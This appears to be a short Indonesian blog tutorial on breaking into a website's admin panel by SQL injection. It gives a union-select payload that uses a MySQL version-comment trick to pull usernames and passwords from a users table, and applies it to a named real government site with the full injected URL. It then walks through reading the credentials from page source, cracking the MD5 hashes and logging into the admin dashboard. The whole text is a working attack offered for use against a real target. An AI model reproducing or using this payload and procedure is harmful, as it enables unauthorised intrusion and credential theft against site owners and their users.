Bahan bahan :
Dork : klik disini
Exploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
Contoh Web : http://tf.lan.go.id/statis-1-profil.html ( exploit di belakang nomor )
Contoh : http://tf.lan.go.id/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html
Lalu tekan CTRL+U untuk melihat username dan password
Karena password masih berbentuk MD5 maka harus di decrypt
Decrypt nya disini klik
Langkah terakhir mencari admin loginnya dan login dengan username dan password yang tadi, Jika berhasil maka kita akan masuk ke dashboard admin.
Sekian tutorial nya semoga bermanfaat ^_^
Advertisement